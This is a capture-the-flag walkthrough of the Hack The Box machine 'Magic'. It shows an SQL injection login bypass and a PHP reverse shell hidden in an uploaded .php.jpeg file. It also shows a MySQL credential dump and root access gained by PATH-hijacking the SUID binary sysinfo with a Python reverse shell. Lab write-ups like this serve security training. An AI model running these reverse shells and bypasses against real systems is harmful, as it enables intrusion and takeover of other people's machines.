Information:~$
| Title | Details |
|---|---|
| Name | Magic |
| IP | 10.10.10.185 |
| Difficulty | Medium |
| Points | 30 |
| OS | Linux |
Brief:~$
Magic is Medium rated linux box which allow us to revise our basic concepts like sql injection, file upload vulnerability. After bypassing login and uploading reverse shell by embedding it into an image we get reverse shell from there we get credentials of mysql and on dumping mysql database we get theseus password. From there we get an SUID binary and on exploiting it by setting PATH variable we are able to gain root access.
Reconnaissance:~$
As usual nmap scan
Nmap:~$
1
nmap -sC -sV 10.10.10.185
Nothing Exciting Just 2 Ports
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.80 scan initiated Wed Apr 29 16:12:56 2020 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.185
Nmap scan report for 10.10.10.185
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 29 16:14:10 2020 -- 1 IP address (1 host up) scanned in 74.76 seconds
We get two ports open 22(SSH), 80(HTTP)
Let’s take a look at Port 80
Nothing exciting except a login Page link
Let’s visit the login page
Initial Foothold:~$
Login page is vulnerbale to SQL injection we can easily bypass it and how did I know that Whenever you see a login Page try common creds and check for sql injection too
User:
adminPassword:' or '1'='1
On Login we get File Upload Functionality
We can use Image Upload functionality in our advantage to gain shell onto system
echo “& /dev/tcp/
/ 0>&1'\");?>” » Image.jpg
1
2
3
4
~/htb/boxes/Magic/scripts >> echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.153/1234 0>&1'\");?>" >> index.jpeg
~/htb/boxes/Magic/scripts >> mv index.jpeg index.php.jpeg
~/htb/boxes/Magic/scripts >> ls
index.php.jpeg
Upload the file Before that start a listener on your machine
As soon as you upload the image open the image in another tab
http://10.10.10.185/images/uploads/ImageName
Check back your Listener for any incoming connection
1
2
3
4
5
6
7
~/htb/boxes/Magic/scripts >> nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.153] from (UNKNOWN) [10.10.10.185] 55038
www-data@ubuntu:/var/www/Magic/images/uploads$ whoami
whoami
www-data
www-data@ubuntu:/var/www/Magic/images/uploads$
Enumeration:~$
On doing some Enumertaion we can find DB Creds in db.php5 file in var/www/Magic
1
2
3
4
5
6
7
8
9
10
11
12
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
......................................
?>
www-data@ubuntu:/var/www/Magic$
Hurray We got password for theseus
1
2
3
4
5
6
www-data@ubuntu:/$ su theseus
su theseus
Password: iamkingtheseus
su: Authentication failure
www-data@ubuntu:/$
Authentication Failure.
Then this should be the login password of the MySQL database. When I was ready to use the mysql command, I was prompted apt-get install, but the MySQL service was clearly running on the target machine
Let’s see what all mysql services we have
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
www-data@ubuntu:/$ ls -lah /usr/bin | grep mysql
ls -lah /usr/bin | grep mysql
-rwxr-xr-x 1 root root 3.5M Jan 21 06:10 mysql_config_editor
-rwxr-xr-x 1 root root 22M Jan 21 06:10 mysql_embedded
-rwxr-xr-x 1 root root 5.0M Jan 21 06:10 mysql_install_db
-rwxr-xr-x 1 root root 3.5M Jan 21 06:10 mysql_plugin
-rwxr-xr-x 1 root root 3.7M Jan 21 06:10 mysql_secure_installation
-rwxr-xr-x 1 root root 3.5M Jan 21 06:10 mysql_ssl_rsa_setup
-rwxr-xr-x 1 root root 3.5M Jan 21 06:10 mysql_tzinfo_to_sql
-rwxr-xr-x 1 root root 4.3M Jan 21 06:10 mysql_upgrade
-rwxr-xr-x 1 root root 3.7M Jan 21 06:10 mysqladmin
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqlanalyze -> mysqlcheck
-rwxr-xr-x 1 root root 3.9M Jan 21 06:10 mysqlbinlog
-rwxr-xr-x 1 root root 3.7M Jan 21 06:10 mysqlcheck
-rwxr-xr-x 1 root root 27K Jan 21 06:10 mysqld_multi
-rwxr-xr-x 1 root root 28K Jan 21 06:10 mysqld_safe
-rwxr-xr-x 1 root root 3.7M Jan 21 06:10 mysqldump
-rwxr-xr-x 1 root root 7.7K Jan 21 06:10 mysqldumpslow
-rwxr-xr-x 1 root root 3.7M Jan 21 06:10 mysqlimport
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqloptimize -> mysqlcheck
-rwxr-xr-x 1 root root 4.1M Jan 21 06:10 mysqlpump
lrwxrwxrwx 1 root root 10 Jan 21 06:10 mysqlrepair -> mysqlcheck
-rwxr-xr-x 1 root root 39K Jan 12 2018 mysqlreport
-rwxr-xr-x 1 root root 3.7M Jan 21 06:10 mysqlshow
-rwxr-xr-x 1 root root 3.7M Jan 21 06:10 mysqlslap
www-data@ubuntu:/$
What can we do now, Let’s see if there is anyway to create backup
I found this article (https://support.hostway.com/hc/en-us/articles/360000220190-How-to-backup-and-restore-MySQL-databases-on-Linux)
Privilege Escalation:~$
www-data -> theseus:~$
1
2
3
4
5
6
7
8
9
10
11
1. Back up the database using the following command:
mysqldump -u [username] –p[password] [database_name]
The parameters of the said command as follows:
[username] - A valid MySQL username.
[password] - A valid MySQL password for the user.
[database_name] - A valid Database name you want to take backup.
Let’s dump the databse Mango
1
mysqldump --databases Magic -utheseus -piamkingtheseus
we get username and password admin:Th3s3usW4sK1ng
1
2
3
4
5
6
7
8
9
www-data@ubuntu:/$ su theseus
su theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:/$ whoami && id
whoami && id
theseus
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@ubuntu:/$
We are theseus
For Stable Shell write your ssh public key in /home/theseus/.ssh/authorized_keys
theseus -> root:~$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
~/htb/boxes/Magic >> ssh theseus@10.10.10.185
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
29 packages can be updated.
0 updates are security updates.
Your Hardware Enablement Stack (HWE) is supported until April 2023.
theseus@ubuntu:~$ id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@ubuntu:~$
We have got a stable shell let’s move forward
Enumerate
Find the SUID files
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
theseus@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
.....................
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping
theseus@ubuntu:~$
We can find an Unusal SUID sysinfo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
theseus@ubuntu:~$ /bin/sysinfo
====================Hardware Info====================
H/W path Device Class Description
=====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7401P 24-Core Processor
/0/1/0 memory 16KiB L1 cache
/0/1/1 memory 16KiB L1 cache
/0/1/2 memory 512KiB L2 cache
/0/1/3 memory 512KiB L2 cache
/0/2 processor AMD EPYC 7401P 24-Core Processor
/0/28 memory System Memory
/0/28/0 memory 4GiB DIMM DRAM EDO
/0/100 bridge 440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1 bridge 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7 bridge 82371AB/EB/MB PIIX4 ISA
/0/100/7.1 storage 82371AB/EB/MB PIIX4 IDE
/0/100/7.3 bridge 82371AB/EB/MB PIIX4 ACPI
...............................
====================Disk Info====================
Disk /dev/loop0: 3.7 MiB, 3825664 bytes, 7472 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop1: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
..........................
====================CPU Info====================
processor : 0
vendor_id : AuthenticAMD
cpu family : 23
model : 1
model name : AMD EPYC 7401P 24-Core Processor
stepping : 2
microcode : 0x8001230
cpu MHz : 2000.000
cache size : 512 KB
...............................
====================MEM Usage=====================
total used free shared buff/cache available
Mem: 3.8G 624M 1.8G 4.1M 1.4G 3.0G
Swap: 947M 0B 947M
theseus@ubuntu:~$
The content displayed by sysinfo is mainly divided into four parts
- Hardware Info
- Disk Info
- CPU Info
- Mem Usage
After checking the tips given by Forum’s predecessors, I found that sysinfo is a combination of four Linux commands:
- Hardware Info = lshw -short
- Disk Info = fdisk -l
- CPU Info = cat /proc/cpuinfo
- Mem Usage = free -h
Since sysinfo the native Linux command is called, we can change the PATH variable to create a content that is determined by ourselves, and the file name is any one of the above four binary files, specifically:
/tmp/magic Create a fdisk file in the directory , and then write a reverse shell to it:
1
2
3
4
5
6
theseus@ubuntu:/tmp/magic$ cat fdisk
python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.153",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
theseus@ubuntu:/tmp/magic$ chmod 755 fdisk
theseus@ubuntu:/tmp/magic$ ls -lah | grep fdisk
-rwxr-xr-x 1 theseus theseus 228 May 7 23:38 fdisk
theseus@ubuntu:/tmp/magic$
Then write the /tmp/magic directory to the PATH environment variable:
1
theseus@ubuntu:/tmp/magic$ export PATH=/tmp/magic:$PATH
You can find more details HERE
In this way, the goal is achieved, which sysinfo is to execute /tmp/magic the fdisk
The machine monitors port 9001, and the target machine runs sysinfo commands:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
~/htb/boxes/Magic >> rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.153] from (UNKNOWN) [10.10.10.185] 52746
# python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:~# id && whoami
id && whoami
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root
root@ubuntu:~# cd /root/
cd /root/
root@ubuntu:/root# ls
ls
info.c root.txt
root@ubuntu:/root#
Resources:~$
| Topic | Link |
|---|---|
| MySql Backup | Here |
| Privilege Escation using Path varibale | Here |
With this, we come to the end of the story of how I owned Magic 😃
Thank you for reading !!!
I would love to hear about any suggestions or queries.